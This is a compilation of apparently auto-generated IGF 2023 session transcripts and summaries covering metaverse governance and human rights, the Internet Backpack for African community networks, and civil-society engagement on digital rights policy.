has been extremely difficult to overcome. So, governance and accountability. It’s good to be accountable to yourself, but you can also get away with certain things. I try to be accountable, but I’m not always so accountable. Don’t tell anyone, but that’s the reality. If you’re judge and party, you cannot be totally objective. So, we need to, in this multi-stakeholder approach, come to common sense. I think this IGF also points at it. That is that we need to be able to, on the basis of a number of common principles, common values, how do we want to see the next step, not only in internet governance and artificial intelligence, but how do we also measure that in terms of the immersive realities and how are we going to position ourselves to that? Are we going to be naive in hoping that the next generation will be simple and will be defensive or not?

Irene Kitsara:
Thank you. Let’s now move to Melodina. And being aware of time, I’m asking all the speakers onward to be conscious of that so that we leave time for the Q&A. Melodina?

Melodena Stephens:
Yes, thank you. So, I would like to very briefly talk about the Universal Human Rights Article 23, which says everyone has the right to work, the free choice of employment, to just and favorable conditions of work and protection against unemployment. The metaverse is data hungry, so it basically consumes your data, just like Clara and Patrick have mentioned. And the worry is it will remove jobs. For the first time, the World Economic Forum, in their 2023 report, has actually said AI technologies, like metaverse, will be a net job loss, not a net job increase. And that means we will not be prepared, because now skills don’t matter, your experience doesn’t matter, all saved on the metaverse and this the cost of not preparing people to have jobs or to keep jobs will be something like 11.5 trillion for training but even more if you look at things like pensions or social security the bigger worry is the jobs that are being formed are often low-paying jobs so the human being is coming to the bottom of the supply chain right and we see this already because some of the jobs are things like tagging content or content moderation i’ll give you an example for example roblox has a very active community and they have 4.25 million developers and if you want to earn on roblox and convert their money that is the roblox to actual u.s dollars you have to make a minimum amount of money and after 4.25 million developers only 11 000 qualified this has a direct impact on health and that’s another universal right right and the impact is well-being especially the uncertainty whether i get to keep my job i think is important so this also raises questions on ip uh assuming my experiences and my skill sets are because of the amount of years i spend and are uniquely mine do i have ip on this we also see another important thing coming in which is perhaps behavioral addiction to technologies like this i mentioned right at the beginning a lot of the metaverse has been built from gaming so we try to gamify behavior and we know for children as an example that many are not just children adults also can get addicted to games so this has been declared a psychiatric disorder in 2019 by who but the worry is as we start putting it into our daily life in shopping in work and in education at what point will the so-called magic circle the circle between reality and imagination disappear and this is something we aren’t actually putting enough research into i would also like to very briefly bring in environment clara mentioned that but the metaverse is something that requires huge amounts of data and computing power hence it has a significant carbon footprint right just take the semiconductor chip which is embedded in most of our technology if you’ve got a mobile phone or a laptop the average ship when you take all of its components travels 50 000 kilometers right and it’s embedded in 169 industries so we’re looking at environmental costs uh in carbon in terms of water because chips are not recycled we see that the e-waste is growing exponentially and less than 17 percent is recycled so this will get into your groundwater and something like mercury we see that in fish across the ocean so it’s not contained uh we also i just want to briefly mention one more thing but culture representation becomes extremely important in the metaverse and i think this will be something nations will have to consider whether it’s stereotypes that are being represented on the metaverse or how do you actually do that so with that adam over to you

Adam Ingle:
thanks um i’ll keep it brief because a lot of the challenges have been discussed um i think one thing that has come out though and always comes out in these discussions is how so many of the issues aren’t unique there exists today and we’re still grappling with the solutions today and now regulation and legislation is forming a response to these issues so i think we’ll actually have to wait and see how the issues in web 2.0 and the regulatory response and the cultural response to these issues plays out to see whether you know we’ll actually start in earnest with the metaverse from a better playing field um but when it comes to kids and the challenges they they face you know i think from our mind um from our mind we want to create a really kid-friendly ecosystem one with high safety standards responsible design um you know limited um ways for harmful contact conduct contract um and in order to do that to create a truly immersive ecosystem we need others to join us and also share our standards because you know we can create all these great lego experiences but a metaverse is interconnected that it’s interoperable so everyone needs to lift their game if we’re going to have a collective approach to address a lot of the harms that that children are going to be facing

Irene Kitsara:
again adam thank you for leading to the to the last question and again because of time i would ask the rest of you to cover we are at the igf so naturally the last question is around governance of the of the metaverse and could you share some key concepts um you know the issues we have been hearing and the considerations and challenges are very much i think known issues from ongoing or previous discussions related to ai generative ai social platforms and gaming how can we address some of these challenges that we heard and what could be some of the considerations and elements we should bear in mind while considering governance of immersive realities. Patrick, would you like to start? Or Melodina, Melodina, would you like to start?

Melodena Stephens:
Sure, so when we look at the governance right now, I just wanna quote something from ITU in 2003, an IGF committed to the WSIS principles, which says, commitment to build people-centric, inclusive and development-oriented information society. I sometimes worry whether we put technology before people. So we see that there’s a lot at the national level in terms of policies, OECD reports 800 AI policies, most of them are in North Africa and Europe. And we also see a lot of data regulations, 62 countries with 144 data regulations, but most of it is fragmentary. So the metaverse will be global and it really requires collaboration across governments. The few governments that have put policies on the metaverse, most of them recommend self-governance. And I think this is because of the adoption curve. So you see South Korea came out with ethical principles, the Agile Nations, which is a coalition group, it’s an IGO with UK, Canada, Denmark, Italy, Singapore, Japan, and UAE, is coming out with a report in this week. And again, it talks about self-governance. China for the first time has actually said, you could file trademarks of NFTs and virtual goods. And this is a big shift that’s coming in. And Australia has a white paper on standards. But again, self-governance, because the time to collaborate and put together an overarching policy will take too long and we need private sector to work with that. Now there are standards coming out. So if we look at something like the metaverse standards, which is an association with 2,400 members, most of it private sector. Now, one of the challenges I would like to bring is open source. So the metaverse builds on top of open source and there’s a proprietary layer. And this really creates a problem. So take, for example, a database of faces. So Megapixel had a data set of 4.7 million faces scrapped from Flickr. Today you can do it from Instagram or from YouTube. And 80% of that was from these places. And it’s used in 900 research papers. So we see this open source does have some challenges that I’d like to highlight. Another one is Apache software. There’s something called the log4j and this is responsible for the 404 error that you see. And they found out there was a problem in its code that created a vulnerability. And what’s interesting is it’s embedded everywhere in Amazon, in Apple, in Minecraft, and all Java systems. And that’s 3 billion devices. So we can just see that this problem will exist. And it’s not really how much foresight you have in that, but how quickly and how transparently we can work together. If we penalize private sector for being transparent, they will hide it and it will make the vulnerability worse. So that’s something we need to find. We find out also that there isn’t much way forward. For example, Barbados wanted to put an embassy online. In the 1961 Vienna Convention, it talks about only physical embassies, but these are countries with limited resources. And if they need to be represented around the world, virtual embassies work. But again, this is a negotiated thing where there isn’t much information on that. I just want to highlight one more thing. Most governments who are being represented on the metaverse are being represented on top of private sector. So they’re using something like Decentraland or the SANS and working with that. I think this raises also interesting questions, at which point I’d like to stop now and hand over.

Irene Kitsara:
Thank you, Melodina. Patrick?

Patrick Penninckx:
Yeah, when you speak about governance, I think there’s a number of governance principles which are already enshrined in what we’ve done on data protection, what we’ve done on cybercrime, what we’re now trying to do also on artificial intelligence within the Council of Europe, questions related to responsibility, to transparency, to explainability, to revocability, to the right to contest. All of those elements need to be looked at. And obviously, what we did when we started to work on the new Convention on Artificial Intelligence, the first thing we did was some kind of a feasibility study that is look at what are all the ethical principles that are already out there and which are applicable, what is the legislation that is out there and that would be applicable to the metaverse, and then look at where are the gaps, and if we have identified the gaps, then look at how, which are the elements that could constitute the elements of a future governance within this. I think I’ll leave it at that.

Clara Neppel:
Thank you, Patrick. Thank you. Well, I think that what we hear now more and more from the private sector as well is that there’s a need for the interoperability of regulation, actually, for regulatory requirements, and one way to achieve this could be, is actually through global standards. And I think that it is important to say that standards are there, of course, to move from principles to practice to actually operationalize regulation, so this would be the top-down approach, and this is important, but we also see a bottom-up approach. So in IEEE, we’ve been working since 2015 on ethically aligned design initiatives, which resulted in a set of standards from value-based design, which can be used also for the metaverse, to defining more closely what is transparency, what does it mean to have age-appropriate design. I think, Adam, you’re a part of that. And so I think that we need to bring together this top-down and bottom-up principles in order to create that framework which works for everyone. Yeah, I think I will just let it here because we want to have some questions as well. Thank you.

Irene Kitsara:
Yes, and I would like now to turn to you and to the audience and see if you have any questions to our panelists. And then I hear we also have an online question. Maybe we can start with that. And you can think in the meantime.

Audience:
Does this work? Can you? Yes. So I will just read the question in the chat from Nina Jane Patel. With increasing immersion of users into this virtual realms, there is potential access to a plethora of biometric data, from eye tracking, to brain activity, to heart rate. How do you envision the governance and regulation of such intimate data in the metaverse? Furthermore, what steps do you believe need to be taken to ensure that individuals’ biometric data remain private and protected from the misuse? Thank you.

Irene Kitsara:
So I can address what we have identified in the report. Maybe that will give an overview of some of the issues that have been identified by the experts. So indeed, we will be looking into much more invasive practical supervision and censoring. And the idea is we will be looking, so our experts have been looking into the idea of rethinking privacy, rethinking what this means. There are different defenders of the introduction of the so-called neural rights. There is in Chile, this has been also covered in their constitution. On the other side, there are some thoughts. There are issues around bystander privacy, not just your own that you can potentially consent to, but also, for example, the people who may be in the same room with you and they don’t know that they are being also recorded with you. So there is a plethora, indeed, of questions. And there are different views around the governance of that, whether there may be also some self-regulation, self-governance principles that could help with that, or whether we should be looking at reinterpretation of existing hard law or introduction of a new one. Do we have any questions? Please, the gentleman.

Audience:
Good morning. Thank you that I could participate in your panel town hall. It’s very interesting, especially if you talk about immersive, but what now, life, technology, or maybe existence. And from that perspective, we in Poland, because I came from Poland, has a different consideration than now. The biggest tension is not on the freedom of expression, not even of personal data and privacy, but much more, and maybe it’s only one of the future tension, freedom of conscience, not from the religious point of view, but from the psychophysical integrity of person. And from that perspective, I would like to ask you if we can suggest something how to deal with this. Also, not only it is one of the part of fundamental rights, of course, but from the technical point of view, it’s, of course, challenging. I understand this. I thought that it was worth to put the question on the table. Thank you.

Patrick Penninckx:
I remember chanting in one of the demonstrations in Belgium in the 1980s that the thoughts are free. I don’t know if the thoughts will still be free, and that’s freedom of conscience indeed. Of course, I don’t know to which extent. Once we are starting to look into interaction between machine and man, and if we see that technology already enhances or has the capacity to influence our behavior, to which extent will it influence our thought processes? I think our thought processes are already being influenced by the messages that we get very directly, otherwise how could you explain that whole forms of the entire populations can be influenced in a certain manner? When I looked at the Edelman Trust Barometer, I saw that in authoritarian regimes, the trust in public service media is the highest. This seems to be contradictory, but it also is quite revealing on how a regime, and whether that be a private or a public entity, can actually influence the way people maybe not think, but at least… act according to what is expected from them. So freedom of thought is definitely, and freedom of religion, because also in the European Convention of Human Rights, this is enshrined, are definitely things which are at stake and that would need to be looked at. Thank you.

Clara Neppel:
If there are no other questions, Robert, it’s my personal view. I think that we are discussing now much more about the moderation, that practically we are discussing about content moderation and if this should be private or public. And probably in order to have a certain balance, we need to have this multi-stakeholder moderation at some point. And this is, I think, that we are here at the International Governance Forum, this should be at the heart of discussions, I think, because this is also what Patrick mentioned before, democratic process cannot happen if you are not, if you cannot control, if you don’t have anonymity, first of all, I think that’s important. If you don’t have anonymity, you cannot actually exercise your rights as a citizen, I think, as well. But that’s my private.

Irene Kitsara:
Just a short, just shortly to that, we are identifying the report of this mental privacy, mental autonomy and the practically reinterpretation of notions that we knew like freedom of expression and what they mean nowadays with these technologies which have the potential of even changing our, not just our perception of reality, but even changing our thought process and even our, you know, the facts. Thank you.

Audience:
Oh, hi, my name is Michael Kernikos, I’m the Executive Director of the UCLA Institute for Technology Law and Policy. I wanted to pick up on what you said about content moderation, because as far as I understand it, the tools to moderate content effectively at scale do not exist for these technologies. So it’s fine right now as long as adoption rates are where they are, but if these things take off rapidly. there’s no actual way to follow the standards that already exist for traditional social media platforms. So is that something that you’re looking into, or this is a legal challenge and a policy challenge as well as a technical challenge? Okay, thank you very much. I’m Steve Fosley from UNICEF. We also did a short report on the metaverse and children and some of the rights. So hopefully that was useful. My question is around, and sorry, maybe this is too big a question for this time, but I’m from South Africa originally. Your thoughts on how the metaverse will play out over time? Because not everybody can afford the $500 or $3,500 headset, and not everybody will. So if these technologies are going to actually scale globally, and that’s also a question, but I think they will, but they’re going to look very different for users in South Africa, in Johannesburg or Cape Town, to perhaps kids, and obviously I’m looking at children in New York, some children in New York. And perhaps we’ve seen some signals of this, of beginning to talk to cloned characters, and you might be talking to them on WhatsApp, it doesn’t have to be in an immersive environment, but it’s beginning to normalize talking to AI, basically. And you’re not always sure if that’s a person or not. So any thoughts on how this might play out? And if there isn’t time now, I’ll be here for the next few days, so I’d love to have a coffee and pick your brains. Thank you.

Irene Kitsara:
Who would like to?

Melodena Stephens:
I need a little microphone. Yes. But I answered. Was it Adam who was going to go ahead? Please. Oh, so I was going to just say one thing, that when we look at the metaverse, generally the standards often come from maybe the IT sector, right? Or the technology sector. But we’re seeing now health coming into that. So it’s really important we don’t approach this in silos, ministries across have to work together. That means health has to sit with social. If you see an impact on people and communities and society, but you also have to sit and work with technology. And that’s missing right now. So, for example, content is being developed for schools. And I don’t know if there’s a psychologist, sociologist involved. I think in Adam’s company, they do. But in many cases, this is not necessarily true. On the case of inclusiveness, these technologies. will get cheaper and cheaper and cheaper. So I see that actually happening because these technologies are only viable at scale. That’s the only way they will work. But then there’s this danger that they will be affordable and embedded and you cannot get rid of it. Think of chat GPT, everyone’s using it. And now we’re trying to figure out how can we use it more? Or what can we do to regulate it? So we’re right now at that wonderful time. We’ve got a 10 year window to have these conversations and come up with the safeguards. And that’s why I think these dialogues are so critical. Thank you.

Irene Kitsara:
Thank you, Melodina. And I think we need to stop here but talking about partnerships, I would like to share with you that the result of the digital partnership that between IEEE and the Council of Europe and stay tuned to the upcoming report on the metaverse and its impact on human rights, the rule of law and democracy, which is expected to be released in early 2024. Thank you very much. And thanks to our panelists and the organizer and our host of course. Thank you.

Adam Ingle

Speech speed

172 words per minute

Speech length

700 words

Speech time

244 secs

Audience

Speech speed

181 words per minute

Speech length

644 words

Speech time

213 secs

Clara Neppel

Speech speed

162 words per minute

Speech length

1918 words

Speech time

713 secs

Hugh

Speech speed

158 words per minute

Speech length

541 words

Speech time

205 secs

Irene Kitsara

Speech speed

172 words per minute

Speech length

1334 words

Speech time

465 secs

Melodena Stephens

Speech speed

176 words per minute

Speech length

2440 words

Speech time

832 secs

Patrick Penninckx

Speech speed

144 words per minute

Speech length

2769 words

Speech time

1150 secs

Africa Community Internet Program Donation Platform Launch | IGF 2023 Launch / Award Event #176

Table of contents

Disclaimer: This is not an official record of the IGF session. The DiploAI system automatically generates these resources from the audiovisual recording. Resources are presented in their original format, as provided by the AI (e.g. including any spelling mistakes). The accuracy of these resources cannot be guaranteed. The official record of the session can be found on the IGF's official website.

Knowledge Graph of Debate

Session report


Yusuf Abdul-Qadir

The discussions held at the UN Internet Governance Forum in Kyoto highlighted the importance of inclusion and ensuring that no one is left behind in the expansion of the internet. The focus was on making the internet inclusive and accessible to all, regardless of their background or location. The talks recognized technology as a crucial tool in enhancing community networks and promoting internet accessibility. It was emphasized that technology can play a significant role in bridging the digital divide and empowering communities.

One of the key initiatives discussed at the forum was the African community Internet program, EODIRF. The aim of this program is to involve regulators, communities, and parliament members in bringing digitalization to grassroots levels. EODIRF works across Africa and collaborates with regional regulators, policymakers, and other internet-connecting organizations.

The importance of empowering individuals with the necessary skill set to set up and maintain networks was emphasized. It was noted that people in rural communities need to acquire specific skills to adapt to digitalization. Furthermore, it was suggested that innovation should stay within the community to ensure better sustainability.

During the forum, the concept of the ‘internet backpack’ was introduced as a solution to bridge the digital divide. This innovative concept allows people to engage with and experience the internet firsthand. The forum participants also emphasized the significance of dialogue, engagement, and innovative solutions, such as the internet backpack, in bridging the digital divide. It was discussed that launching a new opportunity to connect with their website, A-G-C-I-P, could enhance this goal.

One interesting aspect highlighted in the discussions was that the technology being developed for community networks was not designed to be imposed by the West. Instead, it was designed and innovated by individuals from the Democratic Republic of Congo and Haiti, showcasing the significance of local innovation in shaping technological advancements.

The ultimate goal of the initiatives discussed at the forum, including the African community Internet program, is to bring the technology to the African continent, enabling communities to be self-sufficient and sustainable. This approach emphasizes community engagement and a bottom-up approach to development, working with communities and building from grassroots levels. The aim is not to export technology but to create an ecosystem where communities can be self-sufficient.

Overall, the forum emphasized the importance of inclusion, accessibility, and engagement in the expansion of the internet. The discussions brought to light the need for empowering individuals with the necessary skills for digitalization, promoting dialogue and innovative solutions, and fostering local innovation for sustainable development. The participation of all attendees, both physical and virtual, was greatly appreciated, and there is a recognition that more conversations and development are needed to advance the African community Internet program and other similar initiatives.

Audience

The Internet Backpack was unveiled in a presentation, and concerns were raised about its sustainability, maintenance, and the handling of e-waste. Christine, a regulator at the Uganda Communications Commission, attended the presentation and expressed concerns about the end-of-life management of IT equipment and the resulting e-waste. She also questioned who would handle maintenance and technical support in case of equipment failure. Christine suggested that community ownership of such technology could imbue significance and support from community members.

Another audience member named Christine raised questions about the provision for technical support and the management of e-waste. She voiced concerns about the support for operation and maintenance costs and asked about provisions for dealing with e-waste once the equipment reached its end of life.

Discussions took place with a large firm about the lifecycle management of the Internet Backpack and potential e-waste recycling solutions. It was noted that under US law, manufacturers bear the responsibility for e-waste.

Training on operating the Internet Backpack was discussed, with the belief that anyone who can operate a smartphone can operate the backpack. One slide and videos in English and Spanish were presented for training purposes.

The possibility of local manufacture and a decentralized approach for the Internet Backpack was questioned due to the high shipping costs associated with shipping devices, which can account for up to 80% of the costs. Additionally, some components may not be available locally in certain countries. Collaboration with local manufacturers or fab labs was suggested as a potential solution.

Co-creation and a community-centered design approach were advocated for, emphasizing the importance of sitting down with community members and designing solutions that meet their specific needs. It was suggested that solutions could vary based on community needs.

The Internet Backpack comes in different versions, with or without a sound satellite, which affects the price. Furthermore, the design of the backpack is modular, allowing for the connection of additional storage or other features. The system is not closed and allows for additional connections.

There was curiosity among the audience about the possibility and necessity of a server connection for building a community. The role of an email relay server in the community was also questioned.

A cloud-to-edge solution was discussed, which includes core components such as a router, a battery, and a solar panel. It was mentioned that users can add additional components as per their needs, including an email server or a separate router.

There was curiosity among the audience if anyone had added a server to the cloud-to-edge solution before. Unfortunately, no specific evidence or facts were provided to answer this question.

The importance of unlocking universal service funds for financial sustainability was emphasized. The Association for Progressive Communications has been advocating and supporting community networks for many years, and it was noted that business models and organizational compliance are necessary for unlocking funds.

Lastly, there was advocacy for increasing support and capacity building for community networks globally, particularly in Africa. It was encouraging to see more people advocating and working on increasing skills and capacity. It was also stressed that financial sustainability is as important as social, technical, and environmental sustainability.

In conclusion, the Internet Backpack presentation sparked discussions and raised important concerns about sustainability, maintenance, and e-waste management. Training, local manufacture, and community-centered design were also highlighted as key considerations. The different versions and modular design of the backpack provide flexibility for users. The necessity of a server connection and the importance of unlocking universal service funds were also topics of interest. Overall, there is a need for increased support and capacity building for community networks globally, with a particular focus on Africa.

Lee W McKnight

The analysis reveals several key points related to internet access and the Internet Backpack. An important fact is that around 2.6 billion people worldwide still do not have access to the internet. This lack of internet access has significant implications for issues such as the digital divide and reduced inequalities (SDG 9: Industry, Innovation and Infrastructure and SDG 10: Reduced Inequalities). The large number of people without internet access highlights the urgent need to address this issue.

However, there are positive efforts being made to improve internet access. One such effort is the Africa Community Internet Program, which was introduced in 2022. This program aims to increase dialogue with African nations and collaborate with numerous organisations to help increase internet accessibility. This initiative demonstrates a positive step towards bridging the digital divide in Africa, particularly in remote or underserved areas.

Another noteworthy point is the importance of community networks in improving connectivity. Community networks, which can be powered by the Internet Backpack, are highlighted as a significant contribution to addressing the issue of limited internet access. These networks are owned and operated by members of the community, allowing for greater accessibility and connectivity for local residents. By empowering communities to create their own networks, connectivity can be extended to areas where traditional infrastructure may not be available or feasible.

Government cooperation is also identified as crucial for improving internet access. The analysis suggests that progress in addressing the issue of limited internet access could be faster, easier, and better with greater cooperation between national governments. It is encouraging to note that some national governments have already started authorising and allowing community networks, showing a positive shift towards recognising the importance of collaborative efforts in improving internet access.

The Internet Backpack itself is a solar-powered microgrid that serves as an effective solution for improving internet access, particularly in emergency situations. It is designed to connect up to 250 devices simultaneously, providing connectivity via Wi-Fi, 4G, 5G, or satellite. This makes the Internet Backpack a versatile and adaptable solution that can be deployed in various settings and situations.

Furthermore, the sustainability of the Internet Backpack is under discussion with a large firm, particularly in terms of e-waste recycling and lifecycle management. This demonstrates a commitment to responsible consumption and production (SDG 12: Responsible Consumption and Production) and highlights the importance of considering the environmental impact of technological solutions.

The Internet Backpack comes with a full warranty, providing assurance to users about the product’s quality and functionality. It is designed to be operable without requiring special skills, making it accessible to a wide range of users. To support users, instructional videos in English and Spanish are available to train an Internet Backpack operator. The simplicity of operation, coupled with the availability of training materials, further enhances the user experience and accessibility of the Internet Backpack.

Technical support is available to users, with interactions and collaborations with organisations such as the Internet Society, ICANN, and other local communities per country. This collaborative approach ensures that users can receive assistance and guidance in operating and troubleshooting the Internet Backpack. Remote support is also provided, allowing for remote access and diagnostics, further enhancing the convenience and effectiveness of technical support.

It is worth noting that there is a commitment to creating an open source version of the hardware, although the software is currently patented. This commitment aligns with the aim of reducing inequalities (SDG 10: Reduced Inequalities) and ensuring that the benefits of technology are accessible to all. The open source version of the hardware would allow for greater customisation and adaptation to meet specific needs and requirements.

Lastly, the Internet Backpack is not a closed system and can connect with other storage and devices. This flexibility allows for seamless integration with existing infrastructure and expands the capabilities of the Internet Backpack. This feature contributes to the versatility and adaptability of the Internet Backpack, making it a powerful tool for improving internet access in various contexts.

In conclusion, the analysis highlights the significant issue of limited internet access, with around 2.6 billion people worldwide lacking internet connectivity. However, there are positive efforts being made to address this issue, such as the Africa Community Internet Program and the use of community networks. Government cooperation is deemed crucial for improving internet access. The Internet Backpack is a solar-powered microgrid that can connect up to 250 devices, providing connectivity in emergency situations. The sustainability of the Internet Backpack is also under discussion, demonstrating a commitment to responsible consumption and production. The Internet Backpack comes with a full warranty and is designed to be user-friendly, with technical support and remote assistance available. The commitment to creating an open source version of the hardware reflects a commitment to reducing inequalities. The Internet Backpack is not a closed system and can connect with other devices, providing flexibility and adaptability. Overall, the analysis provides insights into the efforts, features, and potential impact of the Internet Backpack in addressing the issue of limited internet access.

Kwaku Antwi

Community networks are a relatively new and distinct phenomenon compared to high-level broadband networks. These networks play a crucial role in empowering individuals at the grassroots level by equipping them with the necessary skills to establish and maintain their own networks. This level of empowerment not only leads to greater sustainability but also enables innovative practices to thrive within the community.

Furthermore, it is essential to engage with policymakers, regulators, and parliamentarians to garner support and authorization for the transition and implementation of community network technology. Policymakers have the authority to enact laws and regulations that govern the use of specific equipment, making their involvement crucial in facilitating the adoption of community networks. By comprehending the concepts and benefits associated with these networks, policymakers can smooth the transition to community network technologies.

The African Open Data International Research Foundation (EODIRF) actively contributes to the development of a network that brings together regional regulators, policymakers, and various organizations involved in internet connectivity across Africa. EODIRF’s commitment to engaging with policymakers and regulators across the continent aims to collaboratively enhance networks and propel grassroots digitalization. By sharing experiences and knowledge with stakeholders, EODIRF strives to improve network infrastructure and promote the widespread adoption of community networks, ultimately driving socio-economic development.

In conclusion, community networks have a significant impact on empowering individuals at the grassroots level by providing them with the skills needed to establish sustainable and innovative networks. Engaging with policymakers and regulators is vital for the successful authorization and transition of community network technology. The African Open Data International Research Foundation’s involvement in building a comprehensive network of regional regulators, policymakers, and internet connectivity organizations demonstrates their dedication to enhancing African networks and promoting grassroots digitalization across the continent.

Jane Coffin

Community networks have emerged as a solution to address infrastructure gaps in underserved areas, including both urban and remote locations. These networks are built from the community out, allowing for more control over connectivity. This approach is gaining traction as an effective way to bridge the digital divide.

Training local individuals to become trainers themselves is crucial for the sustainability of community networks. This empowers the community to take ownership of the network and tailor it to their specific needs. Technical, community development, and local grant-making training are key aspects of this process.

Community networks provide an alternative to traditional forms of connectivity that have failed to reach many communities in urban, rural, remote, unserved, and underserved areas. The success of community networks can be seen in various geographical locations, such as Nairobi, Latin America, and Africa.

Funding is a vital component for community network development. Efforts are being made to decolonize funding, exploring sources such as philanthropic funding, capital from commercial entities and banks. Initiatives like the UN Giga project aim to increase funding opportunities in Sub-Saharan Africa.

Spectrum management plays a crucial role in creating community networks. Collaboration with regulators and policymakers is important to effectively utilize licensed spectrum. However, many community networks currently rely on unlicensed spectrum. Striking a balance between licensed and unlicensed spectrum is necessary for the availability and sustainability of these networks.

Overall, community networks offer a promising approach to address connectivity challenges in underserved areas. By empowering local communities, providing necessary training, exploring diverse funding sources, and navigating spectrum regulations, these networks can create a more inclusive and resilient digital infrastructure for all.

Jane Appih-Okyere

Jane Appih-Okyere is an advocate for improving internet connectivity in rural areas of Ghana in order to enhance education outcomes for children and foster teacher professional development. Her research involved setting up an internet backpack in a rural library specifically for teacher professional development. The introduction of internet access in this setting led to a notable increase in children visiting the library and using online resources, ultimately improving their learning experiences.

One of the key advantages of the internet backpack was the ability for teachers to download and utilize educational videos for classroom teaching purposes. This provided them with an additional tool to engage and educate their students, enhancing the overall educational experience. Additionally, the centralized internet access fostered stronger social connections among teachers, leading to greater collaboration and the sharing of innovative teaching methods. This collaboration, in turn, resulted in an improved learning experience for students.

However, Jane Appih-Okyere also noted a gender disparity in the usage of the provided internet access. Although there was initially an increase in girls’ usage, over time their usage decreased, while boys maintained higher levels of usage. This raises concerns about potential barriers hindering girls from benefiting equally from the educational opportunities provided by the internet. Jane emphasizes the need for further research to identify the underlying factors causing this disparity and develop strategies to ensure equal access and usage for all students.

In conclusion, Jane Appih-Okyere’s research underscores the importance of improving internet connectivity in rural areas of Ghana to enhance education outcomes for children and foster professional development among teachers. The introduction of the internet backpack in a rural library resulted in increased usage of online resources by children, consequently improving their learning experiences. Moreover, the availability of internet access facilitated collaboration among teachers, leading to the sharing of knowledge and improved teaching practices. However, Jane’s observation of a gender disparity in internet usage emphasizes the need for further investigation and intervention to ensure equal access and opportunities for all students.

Speakers

Speech speed

0 words per minute

Speech length

words

Speech time

0 secs

Click for more

Speech speed

0 words per minute

Speech length

words

Speech time

0 secs

Click for more

Speech speed

0 words per minute

Speech length

words

Speech time

0 secs

Click for more

Speech speed

0 words per minute

Speech length

words

Speech time

0 secs

Click for more

Speech speed

0 words per minute

Speech length

words

Speech time

0 secs

Click for more

Speech speed

0 words per minute

Speech length

words

Speech time

0 secs

Click for more

Advocacy to Action: Engaging Policymakers on Digital Rights | IGF 2023

Table of contents

Disclaimer: It should be noted that the reporting, analysis and chatbot answers are generated automatically by DiploGPT from the official UN transcripts and, in case of just-in-time reporting, the audiovisual recordings on UN Web TV. The accuracy and completeness of the resources and results can therefore not be guaranteed.

Full session report

Fernanda Kalianny Martins Sousa

The political climate in Brazil is currently frustrating for civil society organisations, as it hampers their social participation in discussions related to internet governance. While Brazil has been known for its experiments in participatory governance, the new Lula government seems to be lacking the same level of participation as before. This negative sentiment is driving the argument that the political climate is hindering civil society organisations from fully engaging in discussions.

One aspect of internet regulation being discussed in Brazil is Bill 2630, a proposed law aimed at regulating online platforms. Although this law has been the subject of discussion for the past three years, its approval remains uncertain. While some argue that it is a good law with a few problems, there is still uncertainty surrounding its fate. Civil society organisations have been actively working on this law, with the intention of combating the previous government’s approach to internet governance.

Another point of concern is the complexity of the political landscape in relation to platform regulation in Brazil. Political factors and a lack of government consultation with civil society have made the process more intricate. The argument is that the government needs to consider the input of civil society organisations to address these concerns effectively.

Efforts to bring civil society together in Brazil to discuss online regulation have been ongoing for several years. Internet Lab, along with over 50 organisations across the country, has played a significant role in these discussions. Federal Deputy Orlando Silva has also been instrumental in bringing these discussions to parliament. The sentiment around these efforts is neutral, indicating that there is progress in bringing civil society together for these discussions.

The failure of self-regulation in the internet sector is a cause of concern. Even ten years after the approval of Marcos Civil, self-regulation is seen as ineffective. This negative sentiment highlights the importance of learning from past mistakes and ensuring that any form of regulation, including state regulation, is flexible and able to evolve as needed.

Connecting international, national, and local levels in the regulation of internet governance is both challenging and necessary. Internet Lab has been actively working towards this goal. By working in conjunction with different fields in Brazil and the global South, they have been able to push legal boundaries and regulations combating issues such as disinformation.

In Brazil, the need to address political gender-based violence and hate speech against women online is recognised. Efforts have been made to enforce and utilise a law against political gender-based violence. There are also ongoing efforts to approve points related to a law against hate speech online against women in the election mini-reform. The sentiment here is positive, indicating that taking action against these issues is seen as necessary and commendable.

In conclusion, the current political climate in Brazil is creating challenges for civil society organisations in their engagement in discussions related to internet governance. The uncertain fate of Bill 2630, the complexity surrounding platform regulation, and the issues of self-regulation in the internet sector are significant concerns. However, there are ongoing efforts to bring civil society together, connect different levels of governance, and address specific issues like political gender-based violence and hate speech.

Internet Bolivia Foundation

The analysis highlights the effectiveness of working at the municipal and local levels for digital governance. One notable advantage is that municipalities have a better understanding of local needs, enabling them to tailor policies more accurately to meet the specific requirements of their communities. Furthermore, the absence of excessive bureaucracy allows them to handle policies more swiftly and efficiently.

Another benefit of local regulations is their potential as pilot initiatives for other municipalities. When a municipality successfully implements digital regulations, it serves as a model and encourages other jurisdictions to adopt similar policies. This ripple effect is particularly evident in the case of Coroico, where the implementation of regulations led numerous other municipalities to express their interest in adopting comparable policies.

The analysis also underscores the importance of continuous engagement with communities for effective digital governance. Hosting workshops and maintaining a regular presence in communities helps to spread digital literacy and build support for digital policies. It has been found that people are more likely to support and participate when they have a better understanding of the issues at hand. For example, in Villa Montes, the local population expressed eagerness to learn more about digital rights and requested workshops on the subject.

Notably, the Internet Bolivia Foundation advocates for the presence of key champions in specific issues and encourages the involvement of municipalities or local communities in particular topics. These champions can play a vital role in enacting beneficial regulations and driving digital governance initiatives at the community level.

In conclusion, working at the municipal and local levels proves to be highly effective for digital governance. The analysis demonstrates the numerous advantages of this approach, such as a better understanding of local needs, quicker policy implementation, and the potential for pilot initiatives. Continuous engagement with communities, including hosting workshops and involving key champions, fosters digital literacy and enhances support for digital policies. The Internet Bolivia Foundation recognises the power of community-level work and actively advocates for its implementation.

Nick Benequista

The analysis delves into various aspects of policy intervention and awareness, focusing on the positive sentiment towards Liza Garcia’s comprehensive approach. Nick Benequista praises Liza for actively participating in the drafting and implementation of laws, policy shaping, and raising public awareness on digital laws. Liza’s well-rounded involvement impresses Nick, demonstrating her dedication to effective policy intervention.

Furthermore, Nick expresses interest in the influence of civil society on legislative agenda setting. He questions whether civil society can exert influence in determining which legislation gets passed or regulated. This showcases Nick’s curiosity about the extent of civil society’s involvement and impact on policy matters, particularly in the legislative process.

The analysis also highlights the proactive approach of Internet Lab in engaging with policy processes. It mentions that Internet Lab has been actively addressing internet governance issues for the last nine years and has collaborated with a coalition of over 50 organizations in Brazil. This underscores the organization’s commitment and effectiveness in tackling internet governance concerns.

Additionally, the importance of having allies in parliament for effective policy engagement is emphasised. The analysis highlights the crucial role of Federal Deputy Orlando Silva in platform regulation discussions. This highlights the significance of building alliances and having supportive individuals within the legislative sphere to advance effective policy-making.

